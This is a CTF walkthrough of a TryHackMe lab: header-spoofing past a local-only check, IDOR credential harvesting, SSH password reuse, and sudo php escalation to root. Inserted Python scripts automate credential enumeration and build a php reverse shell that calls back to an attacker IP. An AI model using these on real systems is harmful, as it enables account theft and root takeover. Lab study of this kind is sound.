CTF Walkthrough | TryHackMe | Me & My Girlfriend

Kapish Kuchroo
5 min read · Feb 16, 2023


Have you ever wondered how an IDOR vulnerability can lead to root access on a remote machine over SSH? You can follow along by logging in to TryHackMe and opening the room meandmygirlfriend.

Reconnaissance:

I started information gathering with an nmap port scan, which showed ports 22 (SSH) and 80 (HTTP) open.

When I browsed to port 80, I found this message, which was quite different from what I expected.

Adding Headers:

After viewing the page source, I found a message suggesting the use of the x-forwarded-for header.

This was a new concept for me: adding a request header to reach a site that is otherwise hidden. It took me a while to understand, because at first I could not open the site hidden behind this header check.

I captured the request with Burp Suite, sent it to Repeater and added the header to the request.

First I edited a single request and studied the response. With the header in place, I got redirected to the site.

But this only worked for that one request; the next request went out without the header. So I either had to add the same header to every request by hand, which was tedious, or find a way to add it automatically.

I went to Burp's Proxy settings and added a match and replace rule for request headers. This automatically added the header x-forwarded-for: localhost to every request.

Once every request carried this header, I was able to access the website. The server is using X-Forwarded-For to decide whether a request comes from localhost, but that header is set by the client and can hold any value, so the "local only" check is trivially bypassed.

Gaining Access (IDOR):

I registered as a new user and then logged in with the same credentials.

Looking at the URL, the user id is passed in the query string, which is a classic spot for an IDOR (Insecure Direct Object Reference) vulnerability: the server uses the id to look up the record but never checks that the logged-in user is authorised to view it.

I kept changing the user id parameter and found multiple users on the website. Here I found one user with user id 9.

I was able to recover the password as well.

For user id 5 I found the user Alice with the password 4lic3.

Through this IDOR vulnerability I found 6 users with different user ids. The most interesting one is Alice.
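As an added example (not the author's code or anything from the room), here are the two steps above scripted in Python: every request carries the x-forwarded-for: localhost header, the way the Burp match and replace rule did, and the user id is walked through a range to harvest the exposed credentials. The profile path /dashboard.php?user_id=N and the form inputs it parses are assumptions; the writeup only shows that the id sits in the query string. The fake_fetch stand-in is constructed so the file runs offline and models a server that trusts X-Forwarded-For and never checks who owns the requested id.

```python
import re
import urllib.request
from typing import Callable, Dict, Optional

# Header the hidden message hinted at. Burp's match-and-replace rule added it
# to every proxied request; here every call to fetch() carries it instead.
SPOOF_HEADERS = {"X-Forwarded-For": "localhost"}

# Assumed URL shape (the writeup only shows that the id sits in the query string).
PROFILE_PATH = "/dashboard.php?user_id={uid}"

# Assumed page layout: the profile form echoes both values back in inputs.
USER_RE = re.compile(r'name="username"[^>]*\bvalue="([^"]*)"')
PASS_RE = re.compile(r'name="password"[^>]*\bvalue="([^"]*)"')

Fetcher = Callable[[str, Dict[str, str]], str]


def fetch_http(url: str, headers: Dict[str, str]) -> str:
    """Real fetcher: one GET with the spoofed header attached."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_profile(html: str) -> Optional[Dict[str, str]]:
    """Return {'username', 'password'} from a profile page, or None if the
    page holds no populated username field (unknown id, or access denied)."""
    user = USER_RE.search(html)
    if not user or not user.group(1):
        return None
    pwd = PASS_RE.search(html)
    return {"username": user.group(1), "password": pwd.group(1) if pwd else ""}


def enumerate_users(base_url: str, first: int, last: int,
                    fetch: Fetcher = fetch_http) -> Dict[int, Dict[str, str]]:
    """Walk user_id=first..last. The IDOR is that the server resolves the id
    straight to a record without checking it belongs to the logged-in user."""
    found: Dict[int, Dict[str, str]] = {}
    for uid in range(first, last + 1):
        html = fetch(base_url + PROFILE_PATH.format(uid=uid), SPOOF_HEADERS)
        creds = parse_profile(html)
        if creds:
            found[uid] = creds
    return found


# --- constructed stand-in for the target so the file runs offline -----------
# Only alice/4lic3 at id 5 comes from the writeup; the other row is made up.
FAKE_DB = {1: ("bob", "b0b-pass"), 5: ("alice", "4lic3")}


def fake_fetch(url: str, headers: Dict[str, str]) -> str:
    """Models the server: trusts X-Forwarded-For for its 'local only' check,
    then serves whatever user_id is asked for."""
    if headers.get("X-Forwarded-For") != "localhost":
        return "<p>Sorry, this site can only be accessed locally.</p>"
    m = re.search(r"user_id=(\d+)", url)
    uid = int(m.group(1)) if m else -1
    user, pwd = FAKE_DB.get(uid, ("", ""))
    return (f'<input type="text" name="username" value="{user}">'
            f'<input type="text" name="password" value="{pwd}">')


if __name__ == "__main__":
    # Swap fake_fetch for fetch_http and base_url for the real host to run live.
    for uid, creds in enumerate_users("http://target", 1, 10, fetch=fake_fetch).items():
        print(uid, creds["username"], creds["password"])
```

Against the real box you would replace fake_fetch with fetch_http and the base URL with the target; since the session cookie is not needed to trigger the IDOR in this model, none is sent, add one to the headers dict if the real page requires it.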

I remembered that port 22 was open and saw this as an opportunity to log in to the machine with the same password I had found on the website, betting on password reuse between the web app and SSH.
I used the ssh command to log in as alice.

I enumerated alice's home directory and found the first flag in the my_secret directory.

Privilege Escalation:

After finding the first flag, I moved on to the root flag, starting with the sudo -l command to see what alice could run as root.

It showed that alice could run /usr/bin/php with sudo, and GTFOBins has a reverse shell entry for php.
I edited the reverse shell command to use my Kali machine's IP address and port 1234, where I had a netcat listener waiting.

I ran the command from the alice SSH session, caught a root shell on the netcat listener, and found the flag in the /root directory.
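As an added example (not the author's or the room's code), a small Python helper that parses sudo -l output and maps each sudo-able binary to the matching GTFOBins recipe, including the php reverse shell used above. The sample sudo -l output, the hostname "target" and the attacker IP 10.0.0.1 are constructed; the GTFOBins command strings are reproduced from memory and should be checked against https://gtfobins.github.io before use.

```python
import re
import shlex
from typing import Dict, List, NamedTuple, Optional


class SudoRule(NamedTuple):
    runas: str      # user the command runs as, e.g. "root" or "ALL"
    nopasswd: bool  # True when the rule carries the NOPASSWD: tag
    command: str    # the command spec, possibly several separated by commas


# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/php"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Parse the rule lines that follow 'may run the following commands'."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            # "(ALL : ALL)" lists runas user and group; keep the user part.
            runas = m.group("runas").split(":")[0].strip() or "root"
            rules.append(SudoRule(runas, "NOPASSWD:" in m.group("tags"),
                                  m.group("cmd").strip()))
    return rules


# Local-shell recipes for a few binaries as listed in GTFOBins' sudo section.
# Reproduced from memory; confirm against https://gtfobins.github.io before use.
GTFOBINS_SUDO = {
    "php": "sudo php -r \"system('/bin/sh');\"",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
    "env": "sudo env /bin/sh",
}


def php_reverse_shell(rhost: str, rport: int) -> str:
    """GTFOBins' php reverse-shell one-liner with host/port inlined and run
    through sudo, so the callback lands as root. Catch it with
    `nc -lvnp <rport>` on the attacking machine."""
    payload = ('$sock=fsockopen("%s",%d);exec("/bin/sh -i <&3 >&3 2>&3");'
               % (rhost, rport))
    return "sudo php -r " + shlex.quote(payload)


def suggest_escalations(sudo_output: str, rhost: Optional[str] = None,
                        rport: int = 1234) -> Dict[str, str]:
    """Map each sudo-able binary to a GTFOBins command; php gets the reverse
    shell when an attacker host is given, otherwise the local shell."""
    suggestions: Dict[str, str] = {}
    for rule in parse_sudo_l(sudo_output):
        for spec in rule.command.split(","):
            if not spec.strip():
                continue
            binary = spec.strip().split()[0]
            name = binary.rsplit("/", 1)[-1]
            if name == "php" and rhost:
                suggestions[binary] = php_reverse_shell(rhost, rport)
            elif name in GTFOBINS_SUDO:
                suggestions[binary] = GTFOBINS_SUDO[name]
    return suggestions


# Constructed `sudo -l` output in the shape the writeup describes (hostname and
# Defaults line are made up; the php rule is what the post reports).
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/php
"""

if __name__ == "__main__":
    # 10.0.0.1 stands in for the attacker's IP; port 1234 matches the writeup.
    for binary, cmd in suggest_escalations(SAMPLE_SUDO_L, rhost="10.0.0.1").items():
        print(binary, "->", cmd)
```

The NOPASSWD tag matters in practice: with it, the php command runs as root without alice's password, which is why a leaked web credential was enough to go all the way to /root here.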

See you guys in the next one. Peace ✌🏽
